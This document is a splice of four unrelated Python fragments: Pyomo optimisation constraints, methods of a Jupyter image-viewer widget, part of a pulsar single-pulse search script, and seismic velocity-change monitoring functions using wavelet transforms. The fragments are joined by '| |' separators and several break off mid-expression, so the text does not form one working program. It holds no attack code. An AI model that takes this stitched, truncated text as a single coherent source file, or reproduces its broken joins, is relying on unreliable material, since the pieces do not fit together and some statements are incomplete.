m.c1701 = Constraint(expr= - m.x322 - m.x354 - m.x386 - m.x418 - m.x450 - m.x482 - m.x514 - m.x546 <= 0)
m.c1702 = Constraint(expr= - m.x323 - m.x355 - m.x387 - m.x419 - m.x451 - m.x483 - m.x515 - m.x547 <= 100)
m.c1703 = Constraint(expr= - m.x324 - m.x356 - m.x388 - m.x420 - m.x452 - m.x484 - m.x516 - m.x548 <= 100)
m.c1704 = Constraint(expr= - m.x325 - m.x357 - m.x389 - m.x421 - m.x453 - m.x485 - m.x517 - m.x549 <= 100)
m.c1705 = Constraint(expr= - m.x326 - m.x358 - m.x390 - m.x422 - m.x454 - m.x486 - m.x518 - m.x550 <= 100)
m.c1706 = Constraint(expr= - m.x327 - m.x359 - m.x391 - m.x423 - m.x455 - m.x487 - m.x519 - m.x551 <= 0)
m.c1707 = Constraint(expr= - m.x328 - m.x360 - m.x392 - m.x424 - m.x456 - m.x488 - m.x520 - m.x552 <= 100)
m.c1708 = Constraint(expr= - m.x329 - m.x361 - m.x393 - m.x425 - m.x457 - m.x489 - m.x521 - m.x553 <= 100)
m.c1709 = Constraint(expr= m.x322 - m.x330 - m.x334 + m.x354 - m.x362 - m.x366 + m.x386 - m.x394 - m.x398 + m.x418
- m.x426 - m.x430 + m.x450 - m.x458 - m.x462 + m.x482 - m.x490 - m.x494 + m.x514 - m.x522
- m.x526 + m.x546 - m.x554 - m.x558 <= 75)
m.c1710 = Constraint(expr= m.x323 - m.x331 - m.x335 + m.x355 - m.x363 - m.x367 + m.x387 - m.x395 - m.x399 + m.x419
- m.x427 - m.x431 + m.x451 - m.x459 - m.x463 + m.x483 - m.x491 - m.x495 + m.x515 - m.x523
- m.x527 + m.x547 - m.x555 - m.x559 <= 100)
m.c1711 = Constraint(expr= m.x324 - m.x332 - m.x336 + m.x356 - m.x364 - m.x368 + m.x388 - m.x396 - m.x400 + m.x420
- m.x428 - m.x432 + m.x452 - m.x460 - m.x464 + m.x484 - m.x492 - m.x496 + m.x516 - m.x524
- m.x528 + m.x548 - m.x556 - m.x560 <= 100)
m.c1712 = Constraint(expr= m.x325 - m.x333 - m.x337 + m.x357 - m.x365 - m.x369 + m.x389 - m.x397 - m.x401 + m.x421
- m.x429 - m.x433 + m.x453 - m.x461 - m.x465 + m.x485 - m.x493 - m.x497 + m.x517 - m.x525
- m.x529 + m.x549 - m.x557 - m.x561 <= 100)
m.c1713 = Constraint(expr= m.x326 - m.x338 - m.x342 + m.x358 - m.x370 - m.x374 + m.x390 - m.x402 - m.x406 + m.x422
- m.x434 - m.x438 + m.x454 - m.x466 - m.x470 + m.x486 - m.x498 - m.x502 + m.x518 - m.x530
- m.x534 + m.x550 - m.x562 - m.x566 <= 100)
m.c1714 = Constraint(expr= m.x327 - m.x339 - m.x343 + m.x359 - m.x371 - m.x375 + m.x391 - m.x403 - m.x407 + m.x423
- m.x435 - m.x439 + m.x455 - m.x467 - m.x471 + m.x487 - m.x499 - m.x503 + m.x519 - m.x531
- m.x535 + m.x551 - m.x563 - m.x567 <= 25)
m.c1715 = Constraint(expr= m.x328 - m.x340 - m.x344 + m.x360 - m.x372 - m.x376 + m.x392 - m.x404 - m.x408 + m.x424
- m.x436 - m.x440 + m.x456 - m.x468 - m.x472 + m.x488 - m.x500 - m.x504 + m.x520 - m.x532
- m.x536 + m.x552 - m.x564 - m.x568 <= 100)
m.c1716 = Constraint(expr= m.x329 - m.x341 - m.x345 + m.x361 - m.x373 - m.x377 + m.x393 - m.x405 - m.x409 + m.x425
- m.x437 - m.x441 + m.x457 - m.x469 - m.x473 + m.x489 - m.x501 - m.x505 + m.x521 - m.x533
- m.x537 + m.x553 - m.x565 - m.x569 <= 100)
m.c1717 = Constraint(expr= m.x330 + m.x338 - m.x346 + m.x362 + m.x370 - m.x378 + m.x394 + m.x402 - m.x410 + m.x426
+ m.x434 - m.x442 + m.x458 + m.x466 - m.x474 + m.x490 + m.x498 - m.x506 + m.x522 + m.x530
- m.x538 + m.x554 + m.x562 - m.x570 <= 100)
m.c1718 = Constraint(expr= m.x331 + m.x339 - m.x347 + m.x363 + m.x371 - m.x379 + m.x395 + m.x403 - m.x411 + m.x427
+ m.x435 - m.x443 + m.x459 + m.x467 - m.x475 + m.x491 + m.x499 - m.x507 + m.x523 + m.x531
- m.x539 + m.x555 + m.x563 - m.x571 <= 100)
m.c1719 = Constraint(expr= m.x332 + m.x340 - m.x348 + m.x364 + m.x372 - m.x380 + m.x396 + m.x404 - m.x412 + m.x428
+ m.x436 - m.x444 + m.x460 + m.x468 - m.x476 + m.x492 + m.x500 - m.x508 + m.x524 + m.x532
- m.x540 + m.x556 + m.x564 - m.x572 <= 50)
m.c1720 = Constraint(expr= m.x333 + m.x341 - m.x349 + m.x365 + m.x373 - m.x381 + m.x397 + m.x405 - m.x413 + m.x429
+ m.x437 - m.x445 + m.x461 + m.x469 - m.x477 + m.x493 + m.x501 - m.x509 + m.x525 + m.x533
- m.x541 + m.x557 + m.x565 - m.x573 <= 100)
m.c1721 = Constraint(expr= m.x334 + m.x342 - m.x350 + m.x366 + m.x374 - m.x382 + m.x398 + m.x406 - m.x414 + m.x430
+ m.x438 - m.x446 + m.x462 + m.x470 - m.x478 + m.x494 + m.x502 - m.x510 + m.x526 + m.x534
- m.x542 + m.x558 + m.x566 - m.x574 <= 100)
m.c1722 = Constraint(expr= m.x335 + m.x343 - m.x351 + m.x367 + m.x375 - m.x383 + m.x399 + m.x407 - m.x415 + m.x431
+ m.x439 - m.x447 + m.x463 + m.x471 - m.x479 + m.x495 + m.x503 - m.x511 + m.x527 + m.x535
- m.x543 + m.x559 + m.x567 - m.x575 <= 100)
m.c1723 = Constraint(expr= m.x336 + | |
clim
self.im.append(self.axs[0].imshow(self.data[curr_img], cmap = self.dropdown_cmap.value,
clim = (self.slider_clim.value[0]*0.01*(self.max[curr_img] -
self.min[curr_img]) + self.min[curr_img],
self.slider_clim.value[1]*0.01*(self.max[curr_img] -
self.min[curr_img]) + self.min[curr_img],)))
# if self.compare and self.current_image == 2:
# self.axs[0].imshow(self.error)
# Set correct title
self.axs[0].set_title(self.titles[curr_img])
# Repeat process for histogram
if self.channels[curr_img] in [3, 4]:
self.axs_hist[0].clear()
self.axs_hist[0].axis('off')
self.lines.append(None)
else:
self.axs_hist[0].clear()
self.axs_hist[0].bar(self.bins[curr_img][:-1], self.hist[curr_img],
width = (self.bins[curr_img][1] - self.bins[curr_img][0]) / 1.2)
# Uncomment if condition to show y-axis
# if self.button_show_axis.description == 'Show Axis':
# self.axs_hist[0].axes.yaxis.set_visible(False)
self.axs_hist[0].set_yticks([])
self.axs_hist[0].set_ylabel('Count')
self.axs_hist[0].set_xlabel('Bin')
self.axs_hist[0].set_title(self.titles[curr_img])
if self.max[0] != self.min[0]:
# Assigning this limit is to fully visualize the first bin, otherwise, half of the bin gets lost
self.axs_hist[0].set_xlim(self.min[self.current_image] - 0.01 *(self.max[self.current_image]
- self.min[self.current_image]), self.max[self.current_image])
else:
# If there is only one value in the image, mpl adjusts automatically but throws warning that we want to hide
self.axs_hist[0].set_xlim(self.min[self.current_image] - 0.05, self.min[self.current_image] + 0.05)
self.axs_hist[0].set_ylim(0, 1.1*np.amax(self.hist[curr_img]))
### Block to set lines
xmin = self.slider_clim.value[0]*0.01
xmax = self.slider_clim.value[1]*0.01
# self.lines[0][0].set_xdata([xmin*self.max[self.current_image], xmax*self.max[self.current_image]])
data = [xmin*(self.max[curr_img]-self.min[curr_img])+self.min[curr_img],
xmax*(self.max[curr_img]-self.min[curr_img])+self.min[curr_img]]
self.lines.append(self.axs_hist[0].plot(data, self.axs_hist[0].get_ylim(), 'k', linewidth = '0.3', linestyle = 'dashed'))
# Add colorbar if it existed
if add_cb:
self.set_colorbar(colorbar = True)
# Get the correct x/ylims
if self.data[curr_img].shape == self.data[curr_img - change].shape:
self.axs[0].set_xlim(old_axis[0])
self.axs[0].set_ylim(old_axis[1])
else:
self.xlim[0] = np.array([0 - 0.5, self.image_list[curr_img].shape[1] - 0.5])
self.ylim[0] = np.array([self.image_list[curr_img].shape[0] - 0.5, 0 - 0.5])
# link new axis to callbacks (for zoom) and update stats to new image
self.link_axs()
self.update_stats()
# Manage disabling of buttons (Disable prev if it's the first fig, next if it's the last, else enable both)
if curr_img == self.number_images -1 :
self.button_next.disabled = True
self.button_prev.disabled = False
elif curr_img == 0:
self.button_prev.disabled = True
self.button_next.disabled = False
else:
self.button_next.disabled = False
self.button_prev.disabled = False
# self.fig.tight_layout()
# In case of any transformation to the image, this function will update the information
def update_histogram(self):
'''Auxiliary function to update the histograms.
This function is called by `__init__`, `change_image`, `x_w_callback`
and any function that modifies the current display. It takes ensures
that the histogram in display matches the image.
'''
# Initialize arrays to hold hist and bins
self.hist = []
self.bins = []
# Iterate through each figure and get its histogram its histogram
count = 0
for i in range(self.number_images):
hist, bins = np.histogram(self.data[count], bins = 70, range = (self.min[count], self.max[count]))
# Append info to our bins and hist attributes
self.bins.append(bins)
self.hist.append(hist)
count += 1
# Attribute to store the lines
self.lines = []
# Now, we iterate through the hist_axis's, and show the histogram, according to the use case.
count = 0
for i in range(self.number_images):
# The first conditional is equal to the conditional when activating axis for the images
# print(i, len(self.axs), self.number_images - 1)
if i == len(self.axs) or i == self.number_images - 1:
if len(self.axs) < len(self.data):
break
else:
for j in range(i + 1, len(self.axs)):
self.axs_hist[j].axis('off')
# Display axes, only with the x-axis visible, and with corresponding title
if self.current_image != None:
count = self.current_image
if self.channels[i] in [3, 4]:
self.axs_hist[i].clear()
self.axs_hist[i].axis('off')
# We add this element to make the line consistent with the histograms
self.lines.append(None)
else:
self.axs_hist[i].clear()
if self.max[count] != self.min[count]:
# Assigning this limit is to fully visualize the first bin, otherwise, half of the bin gets lost
self.axs_hist[i].set_xlim(self.min[count] - 0.01 *(self.max[count] - self.min[count]), self.max[count])
else:
# If there is only one value in the image, mpl adjusts automatically but throws warning that we want to hide
self.axs_hist[i].set_xlim(self.min[count] - 0.05, self.min[count] + 0.05)
self.axs_hist[i].set_ylim(0, 1.1*np.amax(self.hist[count]) + 0.05)
self.axs_hist[i].bar(self.bins[count][:-1], self.hist[count], width = (self.bins[count][1] - self.bins[count][0]) / 1.2)
self.lines.append(self.axs_hist[i].plot(self.axs_hist[i].get_xlim(), self.axs_hist[i].get_ylim(), 'k', linewidth = '0.3', linestyle = 'dashed'))
# Hide only y-axis ticks by default
# self.axs_hist[i].axes.yaxis.set_visible(False)
self.axs_hist[i].set_yticks([])
self.axs_hist[i].set_title(self.titles[count])
self.axs_hist[i].set_ylabel('Count')
self.axs_hist[i].set_xlabel('Bin')
count +=1
self.fig_hist.tight_layout()
# self.update_hist_lines()
# Function that links all existing Axes to the Matplotlib callbacks, to act whenever axis limits change (e.i., when there is a zoom)
def link_axs(self):
'''Function called when there is any change in the axis to store
This function is called when an image changes, when there is a zoom
event, or any event to changes the axis. If the functionality *Joint
Zoom* is activated, it updates the axis of the rest of the images
also. Moreover, it updates the statistics, to get the information
from the image currently in display.
'''
def on_xlims_change(event_ax):
# Iterate through all the images
for i in range(self.number_images):
# In the case of single_image == True, stop at the first
if len(self.axs) == 1:
# Update xlim attribute
self.xlim[i] = np.round(event_ax.get_xlim(),1)
break
# Check if joint zoom is on
if self.button_joint_zoom.description == 'Disable Joint Zoom':
self.xlim[i] = np.round(event_ax.get_xlim(),1)
# Else look for the Axes which had the changes
elif event_ax == self.axs[i]:
# Once found, update xlimits
self.xlim[i] = np.round(event_ax.get_xlim(),1)
self.update_stats()
def on_ylims_change(event_ax):
for i in range(self.number_images):
if len(self.axs) == 1:
self.ylim[i] = np.round(event_ax.get_ylim(),1)
break
if self.button_joint_zoom.description == 'Disable Joint Zoom':
self.ylim[i] = np.round(event_ax.get_ylim(),1)
elif event_ax == self.axs[i]:
self.ylim[i] = np.round(event_ax.get_ylim(),1)
self.update_stats()
count = 0
# Connect all Axes to the same handler (The handler we just defined takes care of identifying the Axes that changed)
for ax in self.axs:
if self.number_images == count:
break
ax.set_xlim(self.xlim[count])
ax.set_ylim(self.ylim[count])
ax.callbacks.connect('xlim_changed', on_xlims_change)
ax.callbacks.connect('ylim_changed', on_ylims_change)
count += 1
##########################################################
################# Utility Functions ######################
##########################################################
def get_histogram(self):
#Return histogram information, bins, hist and axes in list form
return(self.bins, self.hist)
def show_histogram(self, hist = False):
if hist:
self.out_fig.layout.width = '45%'
# self.hist_container = widgets.Output()
# self.final_view_hist = widgets.HBox([self.out_fig, self.hist_container, self.out]) #H layout
# # self.final_view_hist = widgets.VBox([self.final_view_no_hist, self.hist_container]) # V layout
# display(self.final_view_hist)
with self.hist_container:
display(self.out_hist) # self.out_hist
else:
self.hist_container.clear_output()
self.out_fig.layout.width = '80%'
def set_widgets(self, widgets = True):
if widgets:
self.widgets = True
else:
self.widgets = False
self.out.clear_output()
self.button_showw.close()
self.update_view()
def set_axis(self, axis = False):
count = 0
# Iterate through the images
for ax in self.axs:
# check that we have images left to plot
if count == len(self.data):
break
ax.axes.yaxis.set_visible(axis)
ax.axes.xaxis.set_visible(axis)
count += 1
count = 0
# uncomment block to extrapolate behaviour to y-axis on histogram
# # Iterate through the histograms (Hide only y-axis)
# for ax in self.axs_hist:
# # check that we have images left to plot
# if count == len(self.data):
# break
# ax.axes.yaxis.set_visible(axis)
# count += 1
def set_colorbar(self, colorbar = True):
if colorbar:
# Redefine attribute holding colorbars. Make sure we have an empty list to append our colorbars
self.cb = []
# Iterate through every AxesImage
count = 0
for ax in self.axs:
# check that we have images left to plot (in case subplots = [m, n], where m*m > num_images), if not, break
if count == len(self.data):
break
if colorbar:
# If colorbar was requested, if so, show it
self.cb.append(self.fig.colorbar(self.im[count], ax = ax))
else:
# If colorbar = False, check if there is an existing colorbar. If so, remove it.
if count < len(self.cb):
self.cb[count].remove()
count += 1
# Now that we have removed the colorbars, empty the list, to get it ready for another call
if not(colorbar):
self.cb = []
# Call plt.draw to show colorbars
plt.draw()
def set_colormap(self, colormap = 'gray'):
# If the user has called this function programatically, change cmap:
self.dropdown_cmap.value = colormap
# Iterate every AxesImage object in our attribute and set the colormap requested
for im in self.im:
im.set_cmap(cmap = colormap)
def get_statistics(self, images = None):
'''Function to get extensive statistics about the displayed images
0123456789112345678921234567893123456789412345678951234567896123456789712345 67898123456789
Function that iterates through all the images in display, and gets
information ony about the current region in display. It firsts
extracts the region, and calculates the mean and standard deviation,
minimum and maximum values, shape, and display limits. It returns
this information in list form, plus a descriptive string used to
display the information in the viewer.
'''
# Initialize | |
import bisect, os, sys, getopt, infodata, glob
import scipy, scipy.signal, ppgplot, scipy.special
import numpy as Num
from presto import rfft
from psr_utils import coord_to_string
from optparse import OptionParser
from Pgplot import *
import pulsarutil as plsr
import numpy.ma as ma
class candidate:
def __init__(self, DM, sigma, time, bin, downfact, block, sig, mean):
self.DM = DM
self.sigma = sigma
self.time = time
self.bin = bin
self.downfact = downfact
self.block = block
self.sig = sig
self.mean = mean
def __str__(self):
return "%7.2f %7.2f %13.6f %10d %3d %3d %3.2f %5.2f\n"%\
(self.DM, self.sigma, self.time, self.bin, self.downfact, \
self.block, self.sig, self.mean)
def __cmp__(self, other):
# Sort by time (i.e. bin) by default)
return cmp(self.bin, other.bin)
class clust_cand:
def __init__(self, DM, sigma_max, time_max, bin_max, nsamp, block, sig, mean, \
sigma_mean, time_mean, bin_mean, time_ctr, bin_ctr, wtot):
self.DM = DM
self.sigma = sigma_max
self.time = time_max
self.bin = bin_max
self.nsamp= nsamp
self.block = block
self.sig = sig
self.mean = mean
self.sigma_mean = sigma_mean
self.time_mean = time_mean
self.bin_mean = bin_mean
self.time_ctr = time_ctr
self.bin_ctr = bin_ctr
self.wtot = wtot
def __str__(self):
return "%7.2f %7.2f %13.6f %10d %3d %3d %3.2f %5.2f %7.2f %13.6f %10d %13.6f %10d %5d\n"%\
(self.DM, self.sigma_mean, self.time_ctr, self.bin_ctr, self.wtot, \
self.block, self.sig, self.mean,
self.sigma, self.time, self.bin, \
self.time_mean, self.bin_mean, self.nsamp)
def __cmp__(self, other):
# Sort by time (i.e. bin) by default)
return cmp(self.bin, other.bin)
def cmp_sigma(self, other):
#Comparison function to sort candidates by significance
retval = -cmp(self.sigma, other.sigma)
return retval
def fft_convolve(fftd_data, fftd_kern, lo, hi):
"""
fft_convolve(fftd_data, fftd_kern, lo, hi):
Perform a convolution with the complex floating point vectors
'fftd_data' and 'fftd_kern'. The returned vector will start at
at bin 'lo' (must be an integer), and go up to but not
include bin 'hi' (also an integer).
"""
# Note: The initial FFTs should be done like:
# fftd_kern = rfft(kernel, -1)
# fftd_data = rfft(data, -1)
prod = Num.multiply(fftd_data, fftd_kern)
prod.real[0] = fftd_kern.real[0] * fftd_data.real[0]
prod.imag[0] = fftd_kern.imag[0] * fftd_data.imag[0]
return rfft(prod, 1)[lo:hi].astype(Num.float32)
def make_fftd_kerns(downfacts, fftlen):
fftd_kerns = []
for downfact in downfacts:
kern = Num.zeros(fftlen, dtype=Num.float32)
# These offsets produce kernels that give results
# equal to scipy.signal.convolve
if downfact % 2: # Odd number
kern[:downfact/2+1] += 1.0
kern[-(downfact/2):] += 1.0
else: # Even number
kern[:downfact/2+1] += 1.0
if (downfact > 2):
kern[-(downfact/2-1):] += 1.0
# The following normalization preserves the
# RMS=1 characteristic of the data
fftd_kerns.append(rfft(kern / Num.sqrt(downfact), -1))
return fftd_kerns
def prune_related1(hibins, hivals, downfact):
# Remove candidates that are close to other candidates
# but less significant. This one works on the raw
# candidate arrays and uses the single downfact
# that they were selected with.
toremove = set()
for ii in range(0, len(hibins)-1):
if ii in toremove: continue
xbin, xsigma = hibins[ii], hivals[ii]
for jj in range(ii+1, len(hibins)):
ybin, ysigma = hibins[jj], hivals[jj]
if (abs(ybin-xbin) > downfact/2):
# if (abs(ybin-xbin) > downfact):
break
else:
if jj in toremove:
continue
if (xsigma > ysigma):
toremove.add(jj)
else:
toremove.add(ii)
# Now zap them starting from the end
toremove = sorted(toremove, reverse=True)
for bin in toremove:
del(hibins[bin])
del(hivals[bin])
return hibins, hivals
def prune_related2(dm_candlist, downfacts):
# Remove candidates that are close to other candidates
# but less significant. This one works on the candidate
# instances and looks at the different downfacts of the
# the different candidates.
toremove = set()
for ii in range(0, len(dm_candlist)-1):
if ii in toremove: continue
xx = dm_candlist[ii]
xbin, xsigma = xx.bin, xx.sigma
for jj in range(ii+1, len(dm_candlist)):
yy = dm_candlist[jj]
ybin, ysigma = yy.bin, yy.sigma
if (abs(ybin-xbin) > max(downfacts)/2):
break
else:
if jj in toremove:
continue
prox = max([xx.downfact/2, yy.downfact/2, 1])
# prox = max([xx.downfact/2+yy.downfact/2, 1])
if (abs(ybin-xbin) <= prox):
if (xsigma > ysigma):
toremove.add(jj)
else:
toremove.add(ii)
# Now zap them starting from the end
toremove = sorted(toremove, reverse=True)
for bin in toremove:
del(dm_candlist[bin])
return dm_candlist
def prune_related3(ts, overthr, nbin=2):
'''Implementation of cluster algorithm used in place of
prune_related1 for efficency (LGS).
ts = times series
overthr = samples in ts that are over threshold
nbin = maximum allowed difference in bins (default 2)
'''
# If ts and overthr empty lists, just give them back
if len(overthr) == 0: return ts, overthr
#Make local copies
tstmp=Num.copy(ts)
overthr=Num.array(overthr)
overthr=Num.cast['int'](overthr)
#Define clusters
#Calculate index where each cluster ends
cl_end=Num.where(overthr[1:]-overthr[:-1] > nbin)[0]
#Append last index to include trailing events
cl_end=Num.append(cl_end, len(overthr)-1)
p=0
params=Num.zeros((len(cl_end),2))
#Loop through clusters and calculate statistics
for i in range(len(cl_end)):
#Define cluster for this loop
ot=overthr[p:cl_end[i]+1]
clust=ts[ot]
nsamp=len(clust)
cwid=ot[-1]-ot[0]
smax=overthr[p]+clust.argmax()
amax=Num.max(clust)
params[i:]=smax,amax
p=cl_end[i]+1
return params.transpose()
def prune_border_cases(dm_candlist, offregions):
# Ignore those that are locate in a half-width
# of the boundary between data and padding
#print offregions
toremove = set()
for ii in range(len(dm_candlist))[::-1]:
cand = dm_candlist[ii]
loside = cand.bin-cand.downfact/2
hiside = cand.bin+cand.downfact/2
if hiside < offregions[0][0]: break
for off, on in offregions:
if (hiside > off and loside < on):
toremove.add(ii)
# Now zap them starting from the end
toremove = sorted(toremove, reverse=True)
for ii in toremove:
del(dm_candlist[ii])
return dm_candlist
full_usage = """
usage: single_pulse_search.py [options] .dat files _or_ .singlepulse files
[-h, --help] : Display this help
[-m, --maxwidth] : Set the max downsampling in sec (see below for default)
[-p, --noplot] : Look for pulses but do not generate a plot
[-t, --threshold] : Set a different threshold SNR (default=5.0)
[-x, --xwin] : Don't make a postscript plot, just use an X-window
[-s, --start] : Only plot events occuring after this time (s)
[-e, --end] : Only plot events occuring before this time (s)
[-g, --glob] : Use the files from these glob expressions (in quotes)
[-f, --fast] : Use a less-accurate but much faster method of detrending
Perform a single-pulse search (or simply re-plot the results of a
single-pulse search) on a set of de-dispersed time series (.dat
files).
The search attempts to find pulses by matched-filtering the data
with a series of different width boxcar functions. The possible
boxcar sizes are [1, 2, 3, 4, 6, 9, 14, 20, 30, 45, 70, 100, 150]
bins. By default the boxcars <= 30 are used. You can specify
that the larger boxcars are used with the -m (or --maxwidth) option.
The matched filtering (and accounting for all the possible 'phase'
offsets of each boxcar) is accomplished by convolving the boxcars
with the full resolution data. 'Duplicate' candidates from this
process are filtered, leaving only the most significant. The time
series are initially smoothed using a piecewise linear fit to the
data where each piece is 2000 data points long.
If the input files are .singlepulse files, we won't actually perform
a search, we'll only read in the output .singlepulse files and make
a plot using the information they contain (along with the
corresponding .inf files).
Copyright <NAME> <<EMAIL>>, 2005
"""
usage = "usage: %prog [options] .dat files _or_ .singlepulse files"
def read_singlepulse_files(infiles, threshold, T_start, T_end):
DMs = []
candlist = []
num_v_DMstr = {}
for ii, infile in enumerate(infiles):
if infile.endswith(".singlepulse"):
filenmbase = infile[:infile.rfind(".singlepulse")]
elif infile.endswith(".cluster"):
filenmbase = infile[:infile.rfind(".cluster")]
else:
filenmbase = infile
info = infodata.infodata(filenmbase+".inf")
DMstr = "%.2f"%info.DM
DMs.append(info.DM)
num_v_DMstr[DMstr] = 0
if ii==0:
info0 = info
if os.stat(infile)[6]:
try:
cands = Num.loadtxt(infile)
if len(cands.shape)==1:
cands = Num.asarray([cands])
for cand in cands:
if cand[2] < T_start: continue
if cand[2] > T_end: break
if cand[1] >= threshold:
if infile.endswith(".cluster"): candlist.append(clust_cand(*cand))
else: candlist.append(candidate(*cand))
num_v_DMstr[DMstr] += 1
except: # No candidates in the file
IndexError
DMs.sort()
return info0, DMs, candlist, num_v_DMstr
def clean_timeseries(ts, clust_len=4, nabove=10.0, debug=False):
'''Attempts to clean a time series to get reliable
calculation of mean and std.
It applies a threshold and looks for greater than
length clust_len and takes out a region surrounding it
Inputs:
ts = time series
thr = SNR multiplier for threshold
clust_len = the minimum length assumed for a cluster
debug = will additionally return masked time series
Outputs:
tmean = cleaned mean of time series
tsig = cleaned standard deviation of time series
'''
nloops=0
#Copy time series array and make it a masked array
tstmp=Num.copy(ts)
| |
np.max(freq)
itvec = np.arange(np.int((tmin-t.min())/dt)+1, np.int((tmax-t.min())/dt)+1)
tvec = t[itvec]
# apply cwt on two traces
cwt1, sj, freq, coi, _, _ = pycwt.cwt(cur, dt, dj, s0, J, wvn)
cwt2, sj, freq, coi, _, _ = pycwt.cwt(ref, dt, dj, s0, J, wvn)
# extract real values of cwt
rcwt1, rcwt2 = np.real(cwt1), np.real(cwt2)
# zero out data outside frequency band
if (fmax> np.max(freq)) | (fmax <= fmin):
raise ValueError('Abort: input frequency out of limits!')
else:
freq_indin = np.where((freq >= fmin) & (freq <= fmax))[0]
# convert wavelet domain back to time domain (~filtering)
if not allfreq:
# inverse cwt to time domain
icwt1 = pycwt.icwt(cwt1[freq_indin], sj[freq_indin], dt, dj, wvn)
icwt2 = pycwt.icwt(cwt2[freq_indin], sj[freq_indin], dt, dj, wvn)
# assume all time window is used
wcwt1, wcwt2 = np.real(icwt1), np.real(icwt2)
# Normalizes both signals, if appropriate.
if normalize:
ncwt1 = (wcwt1 - wcwt1.mean()) / wcwt1.std()
ncwt2 = (wcwt2 - wcwt2.mean()) / wcwt2.std()
else:
ncwt1 = wcwt1
ncwt2 = wcwt2
# run stretching
dvv, err, cc, cdp = ts_dvv(ncwt2[itvec], ncwt1[itvec], dv_range, nbtrial, para)
return dvv, err
# directly take advantage of the real-valued parts of wavelet transforms
else:
# initialize variable
nfreq=len(freq_indin)
dvv, cc, cdp, err = np.zeros(nfreq,dtype=np.float32), np.zeros(nfreq,dtype=np.float32),\
np.zeros(nfreq,dtype=np.float32),np.zeros(nfreq,dtype=np.float32)
# loop through each freq
for ii, ifreq in enumerate(freq_indin):
# prepare windowed data
wcwt1, wcwt2 = rcwt1[ifreq], rcwt2[ifreq]
# Normalizes both signals, if appropriate.
if normalize:
ncwt1 = (wcwt1 - wcwt1.mean()) / wcwt1.std()
ncwt2 = (wcwt2 - wcwt2.mean()) / wcwt2.std()
else:
ncwt1 = wcwt1
ncwt2 = wcwt2
# run stretching
dv, error, c1, c2 = ts_dvv(ncwt2[itvec], ncwt1[itvec], dv_range, nbtrial, para)
dvv[ii], cc[ii], cdp[ii], err[ii]=dv, c1, c2, error
return freq[freq_indin], dvv, err
def wtdtw_dvv(ref,cur,allfreq,para,maxLag,b,direction,dj=1/12,s0=-1,J=-1,wvn='morlet',normalize=True):
"""
Apply dynamic time warping method to continuous wavelet transformation (CWT) of signals
for all frequecies in an interest range
Parameters
--------------
ref: The "Reference" timeseries (numpy.ndarray)
cur: The "Current" timeseries (numpy.ndarray)
allfreq: a boolen variable to make measurements on all frequency range or not
maxLag: max number of points to search forward and backward.
b: b-value to limit strain, which is to limit the maximum velocity perturbation. See equation 11 in (Mikesell et al. 2015)
direction: direction to accumulate errors (1=forward, -1=backward)
dj, s0, J, sig, wvn: common parameters used in 'wavelet.wct'
normalize: normalize the wavelet spectrum or not. Default is True
RETURNS:
------------------
dvv: estimated dv/v
err: error of dv/v estimation
Written by <NAME> (30 Jun, 2019)
"""
# common variables
t = para['t']
twin = para['twin']
freq = para['freq']
dt = para['dt']
tmin = np.min(twin)
tmax = np.max(twin)
fmin = np.min(freq)
fmax = np.max(freq)
itvec = np.arange(np.int((tmin-t.min())/dt)+1, np.int((tmax-t.min())/dt)+1)
tvec = t[itvec]
# apply cwt on two traces
cwt1, sj, freq, coi, _, _ = pycwt.cwt(cur, dt, dj, s0, J, wvn)
cwt2, sj, freq, coi, _, _ = pycwt.cwt(ref, dt, dj, s0, J, wvn)
# extract real values of cwt
rcwt1, rcwt2 = np.real(cwt1), np.real(cwt2)
# zero out cone of influence and data outside frequency band
if (fmax> np.max(freq)) | (fmax <= fmin):
raise ValueError('Abort: input frequency out of limits!')
else:
freq_indin = np.where((freq >= fmin) & (freq <= fmax))[0]
# convert wavelet domain back to time domain (~filtering)
if not allfreq:
# inverse cwt to time domain
icwt1 = pycwt.icwt(cwt1[freq_indin], sj[freq_indin], dt, dj, wvn)
icwt2 = pycwt.icwt(cwt2[freq_indin], sj[freq_indin], dt, dj, wvn)
# assume all time window is used
wcwt1, wcwt2 = np.real(icwt1), np.real(icwt2)
# Normalizes both signals, if appropriate.
if normalize:
ncwt1 = (wcwt1 - wcwt1.mean()) / wcwt1.std()
ncwt2 = (wcwt2 - wcwt2.mean()) / wcwt2.std()
else:
ncwt1 = wcwt1
ncwt2 = wcwt2
# run dtw
dv, error, dist = dtw_dvv(ncwt2[itvec], ncwt1[itvec], para, maxLag, b, direction)
dvv, err = dv, error
return dvv, err
# directly take advantage of the real-valued parts of wavelet transforms
else:
# initialize variable
nfreq=len(freq_indin)
dvv, cc, cdp, err = np.zeros(nfreq,dtype=np.float32), np.zeros(nfreq,dtype=np.float32),\
np.zeros(nfreq,dtype=np.float32),np.zeros(nfreq,dtype=np.float32)
# loop through each freq
for ii, ifreq in enumerate(freq_indin):
# prepare windowed data
wcwt1, wcwt2 = rcwt1[ifreq], rcwt2[ifreq]
# Normalizes both signals, if appropriate.
if normalize:
ncwt1 = (wcwt1 - wcwt1.mean()) / wcwt1.std()
ncwt2 = (wcwt2 - wcwt2.mean()) / wcwt2.std()
else:
ncwt1 = wcwt1
ncwt2 = wcwt2
# run dtw
dv, error, dist = dtw_dvv(ncwt2[itvec], ncwt1[itvec], para, maxLag, b, direction)
dvv[ii], err[ii] = dv, error
return freq[freq_indin], dvv, err
#############################################################
################ MONITORING UTILITY FUNCTIONS ###############
#############################################################
'''
below are assembly of the monitoring utility functions called by monitoring functions
'''
def smooth(x, window='boxcar', half_win=3):
"""
performs smoothing in interested time window
Parameters
--------------
x: timeseris data
window: types of window to do smoothing
half_win: half window length
RETURNS:
------------------
y: smoothed time window
"""
# TODO: docsting
window_len = 2 * half_win + 1
# extending the data at beginning and at the end
# to apply the window at the borders
s = np.r_[x[window_len - 1:0:-1], x, x[-1:-window_len:-1]]
if window == "boxcar":
w = scipy.signal.boxcar(window_len).astype('complex')
else:
w = scipy.signal.hanning(window_len).astype('complex')
y = np.convolve(w / w.sum(), s, mode='valid')
return y[half_win:len(y) - half_win]
def nextpow2(x):
"""
Returns the next power of 2 of x.
"""
return int(np.ceil(np.log2(np.abs(x))))
def getCoherence(dcs, ds1, ds2):
"""
get cross coherence between reference and current waveforms following equation of A3 in Clark et al., 2011
Parameters
--------------
dcs: amplitude of the cross spectrum
ds1: amplitude of the spectrum of current waveform
ds2: amplitude of the spectrum of reference waveform
RETURNS:
------------------
coh: cohrerency matrix used for estimate the robustness of the cross spectrum
"""
n = len(dcs)
coh = np.zeros(n).astype('complex')
